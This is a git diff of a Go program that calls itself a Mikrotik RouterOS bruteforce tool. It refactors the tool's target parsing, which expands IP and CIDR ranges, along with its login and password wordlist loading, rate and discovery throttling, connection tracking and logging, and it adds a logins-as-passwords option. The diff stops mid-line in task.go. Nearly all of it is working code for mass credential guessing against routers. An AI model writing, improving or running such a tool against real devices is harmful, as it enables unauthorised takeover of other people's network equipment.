diff --git a/config.go b/config.go index c15f5f6..7b44baf 100644 --- a/config.go +++ b/config.go @@ -50,15 +50,15 @@ func init() { } header = header + ":" - description := " (description missing)" + full := header if parm.description != "" { - description = " " + parm.description + full = header + "\n " + parm.description } if parm.command || parm.sw { - log("", 0, "%s\n%s", header, description) + log("", 0, "%s", full) } else { - log("", 0, "%s\n%s\n default: %v", header, description, parm.value) + log("", 0, "%s\n default: %v", full, parm.value) } } @@ -99,7 +99,7 @@ type configParameterTypeUnion = interface { // parsing // -------------- -func parseAppConfig() { +func ParseConfig() { log("cfg", 1, "parsing config") totalFinalized := 0 @@ -135,6 +135,7 @@ func parseAppConfig() { parm.writeParmValue("true") } else { i++ + failIf(i >= len(os.Args), "missing value for \"%v\"", parm.name) parm.writeParmValue(getCmdlineParm(i)) } } @@ -143,7 +144,7 @@ func parseAppConfig() { totalFinalized++ } - log("cfg", 1, "parsed %v commandline parameters", totalFinalized) + log("cfg", 1, "ok: finished parsing config, got %v parameters", totalFinalized) } // getCmdlineParm retrieves a commandline parameter with index i. @@ -154,13 +155,28 @@ func getCmdlineParm(i int) string { // isSlice checks if a configParameter value is a slice. func (parm *configParameter) isSlice() bool { switch parm.value.(type) { - case []int, []uint, []string: + case []int, []uint, []bool, []string: return true default: return false } } +func (parm *configParameter) clearSlice() { + if !parm.parsed { + switch parm.value.(type) { + case []int: + parm.value = []int{} + case []uint: + parm.value = []uint{} + case []bool: + parm.value = []bool{} + case []string: + parm.value = []string{} + } + } +} + // writeParmValue saves raw commandline value into a configParameter. func (parm *configParameter) writeParmValue(value string) { var err error @@ -182,16 +198,20 @@ func (parm *configParameter) writeParmValue(value string) { case []bool: b, err := strconv.ParseBool(value) failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + parm.clearSlice() parm.value = append(parm.value.([]bool), b) case []int: i, err := strconv.ParseInt(value, 10, 0) failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.clearSlice() parm.value = append(parm.value.([]int), int(i)) case []uint: u, err := strconv.ParseUint(value, 10, 0) failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.clearSlice() parm.value = append(parm.value.([]uint), uint(u)) case []string: + parm.clearSlice() parm.value = append(parm.value.([]string), value) default: fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value) @@ -336,7 +356,6 @@ func setParam(name string, value any) { parm, ok := configMap[name] failIf(!ok, "unknown config parameter: \"%v\"", name) - failIf(parm.hidden, "config parameter \"%v\" is hidden and cannot be set", name) failIf(parm.command, "config parameter \"%v\" is a command and cannot be set", name) failIf(parm.sw && !value.(bool), "config parameter \"%v\" is a switch and only accepts boolean arguments", name) diff --git a/conn.go b/conn.go index 4f24284..8508bef 100644 --- a/conn.go +++ b/conn.go @@ -13,6 +13,8 @@ type Connection struct { sendTimeout time.Duration recvTimeout time.Duration protocol string + + endpoint *Endpoint } func init() { @@ -23,14 +25,13 @@ func init() { // NewConnection creates a Connection object and optionally connects to an Endpoint. func NewConnection(endpoint *Endpoint) (*Connection, error) { - conn := Connection{} + conn := Connection{protocol: "tcp", endpoint: endpoint} conn.connectTimeout = getParamDurationMS("connect-timeout-ms") conn.sendTimeout = getParamDurationMS("send-timeout-ms") conn.recvTimeout = getParamDurationMS("recv-timeout-ms") - conn.protocol = "tcp" if endpoint != nil { - return &conn, conn.Connect(endpoint) + return &conn, conn.Connect() } else { return &conn, nil } @@ -44,13 +45,23 @@ func (conn *Connection) Close() { } // Connect initiates a connection to an Endpoint. -func (conn *Connection) Connect(endpoint *Endpoint) (err error) { +func (conn *Connection) Connect() (err error) { + conn.endpoint.TakeMutex() + address := conn.endpoint.String() + conn.endpoint.ReleaseMutex() + conn.dialer = net.Dialer{Timeout: conn.connectTimeout, KeepAlive: -1} - conn.socket, err = conn.dialer.Dial(conn.protocol, endpoint.String()) + + start := time.Now() + conn.socket, err = conn.dialer.Dial(conn.protocol, address) if err != nil { - log("conn", 2, "cannot connect to \"%v\": %v", endpoint, err.Error()) + log("conn", 2, "cannot connect to \"%v\": %v", address, err.Error()) } + conn.endpoint.TakeMutex() + conn.endpoint.RegisterRTT(time.Since(start)) + conn.endpoint.ReleaseMutex() + return } @@ -66,6 +77,10 @@ func (conn *Connection) Send(data []byte) (err error) { return nil } + if conn.endpoint != nil { + conn.endpoint.lastSentAt = time.Now() + } + conn.socket.SetWriteDeadline(time.Now().Add(conn.sendTimeout)) _, err = conn.socket.Write(data) return @@ -73,9 +88,13 @@ func (conn *Connection) Send(data []byte) (err error) { // Recv receives data from a Connection. func (conn *Connection) Recv() (data []byte, err error) { - conn.socket.SetReadDeadline(time.Now().Add(conn.recvTimeout)) + if conn.endpoint != nil { + conn.endpoint.lastReceivedAt = time.Now() + } data = make([]byte, 1024) + conn.socket.SetReadDeadline(time.Now().Add(conn.recvTimeout)) + n, err := conn.socket.Read(data) if err != nil { return nil, err diff --git a/endpoint.go b/endpoint.go index 650e00d..0c43277 100644 --- a/endpoint.go +++ b/endpoint.go @@ -7,22 +7,23 @@ import ( "time" ) +var endpoints *list.List // Contains all active and ready endpoints +var delayedEndpoints *list.List // Contains endpoints that are active, but not ready +var globalEndpointMutex sync.Mutex // A mutex for synchronizing Endpoint collections + func init() { endpoints = list.New() delayedEndpoints = list.New() registerParam("port", []int{8291}, "one or more default ports") registerParam("max-aps", 5, "maximum number of attempts per second for an endpoint") - registerSwitch("no-ipv6", "skip IPv6 entries") - registerSwitch("append-default-ports", "always append default ports even for targets in host:port format") - registerSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets") - registerSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found") + registerSwitch("keep-endpoint-on-good", "keep processing endpoint even if a good login/password was found") registerParam("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value") registerParam("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection") registerParam("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections") - registerParam("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections") + registerParam("min-bad-conn", 1, "do not consider removing an endpoint if it does not have this many consecutive bad connections") registerParam("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value") registerParam("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors") @@ -35,6 +36,10 @@ func init() { registerParam("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond") registerParam("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error") registerParam("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error") + + registerParam("discover-percentage", 80, "percentage of threads that should be running host discovery") + registerParam("discover-max-total-aps", 200, "max total attempts per second when discovery is not yet finished") + registerParam("discover-max-endpoint-aps", 10, "max attempts per second for endpoints when discovery is not yet finished") } // FetchEndpoint retrieves an endpoint: first, a delayed list is queried, @@ -55,7 +60,7 @@ func FetchEndpoint() (e *Endpoint, waitTime time.Duration) { el := endpoints.Front() if el == nil { if waitTime == 0 { - log("ep", 1, "out of endpoints") + log("ep", 4, "out of endpoints") return nil, 0 } @@ -66,56 +71,55 @@ func FetchEndpoint() (e *Endpoint, waitTime time.Duration) { endpoints.MoveToBack(el) e = el.Value.(*Endpoint) + if e.state == ES_Deleted { + panic("fetched a deleted endpoint") + } + log("ep", 4, "fetched a normal endpoint: \"%v\"", e) return e, 0 } -type Address struct { - ip string // TODO: switch to a static 16-byte array - port int - v6 bool +// Event is a parameterless version of EventWithParm. +func (e *Endpoint) Event(event TaskEvent) bool { + return e.EventWithParm(event, 0) } -type EndpointState int +// EventWithParm tells an Endpoint that something important has happened, +// or a hint has been acquired. +// It is normally called from a Task handler. +// Returns False if an event resulted in a deletion of its Endpoint. +func (e *Endpoint) EventWithParm(event TaskEvent, parm any) bool { + log("ep", 4, "endpoint event for \"%v\": %v", e, event) -const ( - ES_Normal EndpointState = iota - ES_Delayed - ES_Deleted -) + if event == TE_Generic { + return true // do not process generic events + } -// An Endpoint represents a remote target and stores its persistent data between multiple connections. -type Endpoint struct { - addr Address // IP address of an endpoint + e.TakeMutex() + defer e.ReleaseMutex() - loginPos SourcePos - passwordPos SourcePos // login/password cursors - listElement *list.Element // position in list + switch event { + case TE_NoResponse: + return e.NoResponse() - state EndpointState // which state an endpoint is in - delayUntil time.Time // when this endpoint can be used again + case TE_ProtocolError: + return e.ProtocolError() - // endpoint stats - goodConn, badConn, protoErrors, readErrors int - consecutiveGoodConn, consecutiveBadConn, consecutiveProtoErrors, - consecutiveReadErrors int + case TE_Good: + e.Good(parm.(string)) + return false - mutex sync.Mutex // sync primitive + case TE_Bad: + e.Bad() + case TN_Connected: + e.Connected() + case TH_NoSuchLogin: + e.NoSuchLogin(parm.(string)) + } - // unused, for now - rtt float32 - heuristicBanAPS int - heuristicBanPPS int - lastPacketAt time.Time // when was the last packet sent? - lastAttemptAt time.Time // same, but for attempts + return true // keep this endpoint } -var endpoints *list.List // Contains all active and ready endpoints -var delayedEndpoints *list.List // Contains endpoints that are active, but not ready - -// A mutex for synchronizing Endpoint collections. -var globalEndpointMutex sync.Mutex - func (state EndpointState) String() string { switch state { case ES_Normal: @@ -160,18 +164,18 @@ func (e *Endpoint) Delete() { defer globalEndpointMutex.Unlock() list := e.GetList() - if list != nil { + if list == nil { + log("ep", 3, "cannot delete endpoint \"%v\", not in the list", e) + } else { log("ep", 3, "deleting endpoint \"%v\"", e) - list.Remove(e.listElement) - e.listElement = nil } e.delayUntil = time.Time{} - e.state = ES_Deleted + e.SetStateEx(ES_Deleted, false) } // SetState changes an endpoint's state. -func (e *Endpoint) SetState(newState EndpointState) { +func (e *Endpoint) SetStateEx(newState EndpointState, takeMutex bool) { if e.state == newState { log("ep", 5, "ignoring state change for an endpoint \"%v\": already in state \"%v\"", e, e.state) return @@ -180,10 +184,12 @@ func (e *Endpoint) SetState(newState EndpointState) { oldList := e.GetList() newList := newState.GetList() - globalEndpointMutex.Lock() - defer globalEndpointMutex.Unlock() + if takeMutex { + globalEndpointMutex.Lock() + defer globalEndpointMutex.Unlock() + } - if e.listElement != nil { + if e.listElement != nil && oldList != nil { oldList.Remove(e.listElement) } @@ -194,6 +200,10 @@ func (e *Endpoint) SetState(newState EndpointState) { } } +func (e *Endpoint) SetState(newState EndpointState) { + e.SetStateEx(newState, true) +} + // Delay marks an Endpoint as "delayed" for a certain duration // and migrates it to the delayed queue. // This method assumes that Endpoint's mutex was already taken. @@ -232,9 +242,6 @@ func (e *Endpoint) SkipLogin(login string) { // NoResponse is an event handler that gets called when // an Endpoint does not respond to a connection request. func (e *Endpoint) NoResponse() bool { - e.mutex.Lock() - defer e.mutex.Unlock() - e.badConn++ if e.consecutiveGoodConn == 0 { e.consecutiveBadConn++ @@ -280,9 +287,6 @@ func (e *Endpoint) NoResponse() bool { // ProtocolError is an event handler that gets called when // an Endpoint responds with wrong or missing data. func (e *Endpoint) ProtocolError() bool { - e.mutex.Lock() - defer e.mutex.Unlock() - e.protoErrors++ e.consecutiveProtoErrors++ @@ -316,8 +320,6 @@ func (e *Endpoint) ProtocolError() bool { // Bad is an event handler that gets called when // an authentication attempt to an Endpoint fails. func (e *Endpoint) Bad() { - e.mutex.Lock() - defer e.mutex.Unlock() e.consecutiveProtoErrors = 0 // The endpoint may be in delayed queue, so push it back to the normal queue. @@ -327,8 +329,6 @@ func (e *Endpoint) Bad() { // Good is an event handler that gets called when // an authentication attempt to an Endpoint succeeds. func (e *Endpoint) Good(login string) { - e.mutex.Lock() - defer e.mutex.Unlock() e.consecutiveProtoErrors = 0 if !getParamSwitch("keep-endpoint-on-good") { @@ -342,9 +342,6 @@ func (e *Endpoint) Good(login string) { // Connected is an event handler that gets called when // a connection attempt to an Endpoint succeeds. func (e *Endpoint) Connected() { - e.mutex.Lock() - defer e.mutex.Unlock() - e.goodConn++ if e.consecutiveBadConn == 0 { e.consecutiveGoodConn++ @@ -358,55 +355,12 @@ func (e *Endpoint) Connected() { // a service module determines that a login does not present // on an Endpoint and therefore can be excluded from processing. func (e *Endpoint) NoSuchLogin(login string) { - e.mutex.Lock() - defer e.mutex.Unlock() - e.SkipLogin(login) } -// EventWithParm tells an Endpoint that something important has happened, -// or a hint has been acquired. -// It is normally called from a Task handler. -// Returns False if an event resulted in a deletion of its Endpoint. -func (e *Endpoint) EventWithParm(event TaskEvent, parm any) bool { - log("ep", 4, "endpoint event for \"%v\": %v", e, event) - - if event == TE_Generic { - return true // do not process generic events - } - - switch event { - case TE_NoResponse: - return e.NoResponse() - - case TE_ProtocolError: - return e.ProtocolError() - - case TE_Good: - e.Good(parm.(string)) - return false - - case TE_Bad: - e.Bad() - case TN_Connected: - e.Connected() - case TH_NoSuchLogin: - e.NoSuchLogin(parm.(string)) - } - - return true // keep this endpoint -} - -// Event is a parameterless version of EventWithParm. -func (e *Endpoint) Event(event TaskEvent) bool { - return e.EventWithParm(event, 0) -} - // Exhausted gets called when an endpoint no longer has any valid logins and passwords, // thus it may be deleted. -func (e *Endpoint) Exhausted() { - e.mutex.Lock() - defer e.mutex.Unlock() +func (e *Endpoint) Exhausted() { e.Delete() } @@ -429,10 +383,71 @@ func GetDelayedEndpoint() (e *Endpoint, waitTime time.Duration) { } if dt.delayUntil.Before(currentTime) { - delayedEndpoints.Remove(e) + dt.delayUntil = time.Time{} + dt.SetStateEx(ES_Normal, false) return dt, 0 } } return nil, minWaitTime.Sub(currentTime) } + +func (e *Endpoint) TakeMutex() { + e.mutex.Lock() +} + +func (e *Endpoint) ReleaseMutex() { + e.mutex.Unlock() +} + +func (e *Endpoint) RegisterRTT(rtt time.Duration) { + const rttAverage = 8 + + if e.rttCount == 0 { + e.rtt = rtt + } else { + e.rtt = e.rtt*(rttAverage-1)/rttAverage + rtt/rttAverage + } + + e.rttCount++ +} + +type Address struct { + ip string // TODO: switch to a static 16-byte array + port int + v6 bool +} + +type EndpointState int + +const ( + ES_Normal EndpointState = iota + ES_Delayed + ES_Deleted +) + +// An Endpoint represents a remote target and stores its persistent data between multiple connections. +type Endpoint struct { + addr Address // IP address of an endpoint + + loginPos SourcePos + passwordPos SourcePos // login/password cursors + listElement *list.Element // position in list + + state EndpointState // which state an endpoint is in + delayUntil time.Time // when this endpoint can be used again + + // endpoint stats + goodConn, badConn, protoErrors, readErrors int + consecutiveGoodConn, consecutiveBadConn, consecutiveProtoErrors, + consecutiveReadErrors int + + mutex sync.Mutex // sync primitive + + rtt time.Duration + rttCount uint + + lastSentAt time.Time + lastAttemptAt time.Time + lastReceivedAt time.Time +} diff --git a/eparse.go b/eparse.go index 876a0ee..dd1e9e5 100644 --- a/eparse.go +++ b/eparse.go @@ -7,6 +7,12 @@ import ( "strings" ) +func init() { + registerSwitch("no-ipv6", "skip IPv6 entries") + registerSwitch("append-default-ports", "always append default ports even for targets in host:port format") + registerSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets") +} + // Safety feature, to avoid expanding subnets into a huge amount of IPs. const maxNetmaskSize = 22 // expands into /10 for IPv4 @@ -14,11 +20,11 @@ const maxNetmaskSize = 22 // expands into /10 for IPv4 func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int { for _, port := range ports { ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}} - ep.loginPos.Reset() - ep.passwordPos.Reset() - + ep.loginPos.Init() + ep.passwordPos.Init() + ep.state = ES_Normal ep.listElement = endpoints.PushBack(&ep) - log("ep", 3, "registered endpoint: %v", &ep) + log("eparse", 3, "registered endpoint: %v", &ep) } return len(ports) @@ -37,13 +43,13 @@ func incIP(ip net.IP) { func parseCIDR(ip string, ports []int, isIPv6 bool) int { na, nm, err := net.ParseCIDR(ip) if err != nil { - log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error()) + log("eparse", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error()) return 0 } mask, maskBits := nm.Mask.Size() if mask < maskBits-maxNetmaskSize { - log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize) + log("eparse", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize) return 0 } @@ -52,11 +58,11 @@ func parseCIDR(ip string, ports []int, isIPv6 bool) int { numParsed := 0 strict := getParamSwitch("strict-subnets") - log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1) + log("eparse", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1) for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) { if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 { - log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String()) + log("eparse", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String()) } else { numParsed += RegisterEndpoint(expIP.String(), ports, isIPv6) } @@ -74,7 +80,7 @@ func parseIPOrCIDR(ip string, ports []int, isIPv6 bool) int { if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet return parseCIDR(ip, ports, isIPv6) } else if strings.Count(ip, "/") > 1 { // invalid CIDR notation - log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip) + log("eparse", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip) return 0 } else { // otherwise, just register return RegisterEndpoint(ip, ports, isIPv6) @@ -102,13 +108,18 @@ func extractIPAndPort(str string) (ip string, port int, err error) { } // ParseEndpoints takes a string slice of IPs/CIDR subnets and converts it to a list of endpoints. -func ParseEndpoints(source []string) { - log("ep", 1, "parsing endpoints") +func ParseEndpoints(source []string, name string) { + log("eparse", 1, "parsing endpoints from %v", name) totalIPv6Skipped := 0 numParsed := 0 for _, str := range source { + str = strings.TrimSpace(str) + if str == "" { + continue + } + if !strings.Contains(str, ":") { // no ":": this is an ipv4/dn without port, // parse it with all known ports @@ -131,7 +142,7 @@ func ParseEndpoints(source []string) { ip, port, err := extractIPAndPort(str) if err != nil { - log("ep", 0, "failed to extract ip/port for \"%v\": %v, ignoring endpoint", str, err.Error()) + log("eparse", 0, "failed to extract ip/port for \"%v\": %v, ignoring endpoint", str, err.Error()) continue } @@ -149,6 +160,6 @@ func ParseEndpoints(source []string) { } } - logIf(totalIPv6Skipped > 0, "ep", 0, "skipped %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped) - log("ep", 1, "finished parsing endpoints: parsed %v out of total %v", numParsed, endpoints.Len()) + logIf(totalIPv6Skipped > 0, "eparse", 0, "skipped %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped) + log("eparse", 1, "finished parsing endpoints from %v: parsed %v out of total %v", name, numParsed, endpoints.Len()) } diff --git a/go.mod b/go.mod index fbd155e..65d2527 100644 --- a/go.mod +++ b/go.mod @@ -1,3 +1,10 @@ module mtbf go 1.18 + +require ( + github.com/fatih/color v1.13.0 // indirect + github.com/mattn/go-colorable v0.1.9 // indirect + github.com/mattn/go-isatty v0.0.14 // indirect + golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect +) diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..6ab7ee4 --- /dev/null +++ b/go.sum @@ -0,0 +1,11 @@ +github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= +github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= +github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U= +github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= +github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= +github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= +golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= +golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= diff --git a/log.go b/log.go index d3b2a70..a8c1101 100644 --- a/log.go +++ b/log.go @@ -6,6 +6,8 @@ import ( "fmt" "os" "strings" + + "github.com/fatih/color" ) func init() { @@ -13,6 +15,9 @@ func init() { registerParamWithCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap) registerParamWithCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap) registerParamHidden("log-module-map", map[string]bool{}) + registerCommand("no-colors", "disable terminal colors", func() { + color.NoColor = true + }) } func shouldLog(facility string, level, maxLevel int) bool { @@ -38,10 +43,10 @@ func log(facility string, level int, s string, params ...interface{}) { var prefix = "" if level > 0 { - prefix = strings.Repeat("-", level) + "> " + prefix = color.WhiteString(strings.Repeat("-", level) + "> ") } - if (maxLevel >= 2 || maxLevel < 0) && facility != "" { - prefix = prefix + "[" + strings.ToUpper(facility) + "]: " + if (level >= 1 || maxLevel < 0) && facility != "" { + prefix = prefix + color.CyanString("["+strings.ToUpper(facility)+"]: ") } if len(params) == 0 { @@ -51,11 +56,11 @@ func log(facility string, level int, s string, params ...interface{}) { } } -func fail(s string, params ...interface{}) { +func fail(s string, params ...any) { if len(params) == 0 { - fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n") + fmt.Fprintf(os.Stderr, color.HiRedString("ERROR: ")+s+"\n") } else { - fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n", params...) + fmt.Fprintf(os.Stderr, color.HiRedString("ERROR: ")+s+"\n", params...) } os.Exit(1) } diff --git a/mtbf.go b/mtbf.go index c3c0c1c..be604ce 100644 --- a/mtbf.go +++ b/mtbf.go @@ -1,8 +1,22 @@ package main +import ( + "os" + + "github.com/fatih/color" +) + func main() { - log("main", 0, "mtbf: Mikrotik RouterOS bruteforce | v1.0.1") - parseAppConfig() + defer func() { + if r := recover(); r != nil { + log("main", 0, color.HiRedString("FATAL:")+"%v", r) + os.Exit(1) + } + }() + + log("main", 0, "mtbf: "+color.HiGreenString("Mikrotik RouterOS bruteforce")+" | "+color.CyanString("v1.0.1")) + + ParseConfig() go ResultService() defer EndResults() diff --git a/mtbf_windows.go b/mtbf_windows.go new file mode 100644 index 0000000..e506c90 --- /dev/null +++ b/mtbf_windows.go @@ -0,0 +1,15 @@ +package main + +import ( + "os" + + "golang.org/x/sys/windows" +) + +func init() { + var outMode uint32 + out := windows.Handle(os.Stdout.Fd()) + if err := windows.GetConsoleMode(out, &outMode); err == nil { + _ = windows.SetConsoleMode(out, outMode|windows.ENABLE_VIRTUAL_TERMINAL_PROCESSING) + } +} diff --git a/source.go b/source.go index 93abe86..836bbc9 100644 --- a/source.go +++ b/source.go @@ -22,13 +22,14 @@ var SrcPassword Source = Source{name: "password", plainParmName: "password", func init() { registerParam("ip", []string{}, "IPs or subnets in CIDR notation") - registerParam("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)") + registerParam("ip-file", []string{"ip.txt"}, "paths to files with IPs or subnets in CIDR notation (one entry per line)") registerParam("login", []string{}, "one or more logins") - registerParam("login-file", []string{}, "paths to files with logins (one entry per line)") + registerParam("login-file", []string{"login.txt"}, "paths to files with logins (one entry per line)") registerParam("password", []string{}, "one or more passwords") - registerParam("password-file", []string{}, "paths to files with passwords (one entry per line)") + registerParam("password-file", []string{"password.txt"}, "paths to files with passwords (one entry per line)") registerSwitch("add-empty-password", "insert an empty password to the password list") + registerSwitch("add-logins-as-passwords", "append all logins to the password list") registerSwitch("no-password-trim", "preserve leading and trailing spaces in passwords") registerSwitch("logins-first", "increment logins before passwords") registerSwitch("file-contents-first", "try to go through source files first, defer commandline args for later") @@ -39,18 +40,28 @@ func LoadSources() { log("src", 1, "loading sources") var wg sync.WaitGroup - wg.Add(3) - go SrcIP.LoadSource(&wg) - go SrcLogin.LoadSource(&wg) - go SrcPassword.LoadSource(&wg) + if !getParamBool("add-logins-as-passwords") { + wg.Add(3) + go SrcIP.LoadSource(&wg) + go SrcLogin.LoadSource(&wg) + go SrcPassword.LoadSource(&wg) + } else { + wg.Add(1) + go SrcLogin.LoadSource(&wg) + wg.Wait() + + wg.Add(3) + go SrcIP.LoadSource(&wg) + go SrcPassword.LoadSource(&wg) + } wg.Wait() SrcIP.ReportLoaded() SrcLogin.ReportLoaded() SrcPassword.ReportLoaded() - ParseEndpoints(SrcIP.plain) - ParseEndpoints(SrcIP.contents) + ParseEndpoints(SrcIP.plain, "commandline") + ParseEndpoints(SrcIP.contents, "files") log("src", 1, "ok: finished loading sources") } @@ -59,9 +70,9 @@ func LoadSources() { func CloseSources() { log("src", 1, "closing sources") - SrcIP.CloseSource() - SrcLogin.CloseSource() - SrcPassword.CloseSource() + SrcIP.CloseFiles() + SrcLogin.CloseFiles() + SrcPassword.CloseFiles() log("src", 1, "ok: finished closing sources") } @@ -76,27 +87,31 @@ func (src *Source) LoadSource(wg *sync.WaitGroup) { src.plain = append(src.plain, "") } + if src.name == "password" && getParamSwitch("add-logins-as-passwords") { + src.plain = append(src.plain, SrcLogin.plain...) + src.plain = append(src.plain, SrcLogin.contents...) + } + src.ParsePlain() + src.files = make(map[string]*os.File) src.OpenFiles() - defer src.CloseSource() + defer src.CloseFiles() src.ParseFiles() failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src, src.plainParmName, src.filesParmName) } -// CloseSource closes all files for a Source. -func (src *Source) CloseSource() { - l := len(src.files) +// CloseFiles closes all files for a Source. +func (src *Source) CloseFiles() { for _, file := range src.files { if file != nil { file.Close() } } + log("src", 1, "closed %v %v files", len(src.files), src) src.files = nil - src.fileNames = nil - log("src", 1, "closed all %v %v files", l, src) } // OpenFiles opens all files for a Source. @@ -104,13 +119,14 @@ func (src *Source) OpenFiles() { fileNames := getParamStringSlice(src.filesParmName) for _, fileName := range fileNames { - f, err := os.Open(fileName) - if err != nil { - fail("error opening source file \"%v\": %v", fileName, err.Error()) + if src.files[fileName] != nil { + log("src", 0, "ignoring duplicate %v file \"%v\"", src, fileName) + continue } - src.files = append(src.files, f) - src.fileNames = append(src.fileNames, fileName) + f, err := os.Open(fileName) + failIf(err != nil, "error opening source file \"%v\": %v", fileName, err) + src.files[fileName] = f } if len(src.files) > 0 { @@ -152,9 +168,8 @@ func (src *Source) ParsePlain() { // ParseFiles parses files for a Source. func (src *Source) ParseFiles() { - for i, file := range src.files { - fileName := src.fileNames[i] - log("src", 1, "parsing %v", fileName) + for name, file := range src.files { + log("src", 1, "parsing %v", name) thisTotal := 0 scanner := bufio.NewScanner(file) @@ -174,8 +189,8 @@ func (src *Source) ParseFiles() { } scannerErr := scanner.Err() - failIf(scannerErr != nil, "error reading source file \"%v\": %v", fileName, scannerErr) - log("src", 1, "ok: parsed \"%v\", got %v contents, %v total", fileName, thisTotal, len(src.contents)) + failIf(scannerErr != nil, "error reading source file \"%v\": %v", name, scannerErr) + log("src", 1, "ok: parsed \"%v\", got %v contents, %v total", name, thisTotal, len(src.contents)) } } @@ -185,15 +200,14 @@ func (src *Source) ReportLoaded() { } type Source struct { - name string // name of this source + name string // name of this source + plainParmName string // name of "plain" commandline parameter + filesParmName string // name of "files" commandline parameter - plain []string // sources from commandline - contents []string // sources from files + plain []string // items from commandline + contents []string // items from files - files []*os.File // file pointers - fileNames []string // file names - plainParmName string // name of "plain" commandline parameter - filesParmName string // name of "files" commandline parameter + files map[string]*os.File // file pointers and names transform func(item string) (string, error) // optional transformation function @@ -246,7 +260,7 @@ func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) { } } - logIf(empty, "src", 2, "exhausted source %v for pos %v", src, pos.String()) + logIf(empty, "src", 4, "exhausted source %v for pos %v", src, pos.String()) return res, empty } @@ -261,6 +275,11 @@ type SourcePos struct { contentIdx int } +func (pos *SourcePos) Init() { + pos.plainIdx = 0 + pos.contentIdx = 0 +} + // String converts a SourcePos to its string representation. func (pos *SourcePos) String() string { return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx) diff --git a/task.go b/task.go index a5a5993..d88eb2e 100644 --- a/task.go +++ b/task.go @@ -2,6 +2,7 @@ package main import ( "container/list" + "strconv" "sync" "time" ) @@ -66,6 +67,7 @@ type Task struct { deferUntil time.Time numDeferrals int listElement *list.Element // position in list + thread int // thread index } // String returns a string representation of a Task. @@ -73,7 +75,12 @@ func (task *Task) String() string { if task == nil { return "" } else { - return task.e.String() + "@" + task.login + ":" + task.password + s := task.e.String() + "@" + task.login + ":" + task.password + if task.thread > 0 { + s = "[" + strconv.Itoa(task.thread) + "] " + s + } + + return s } } @@ -110,6 +117,8 @@ func (task *Task) EventWithParm(event TaskEvent, parm any) bool { endpointOk := task.e.EventWithParm(event, parm) // notify the endpoint first + logIf(!endpointOk, "task", 4, "endpoint got deleted during a task event for \"%v\"", task) + switch event { // on these events, defer a Task only if its Endpoint is being kept case 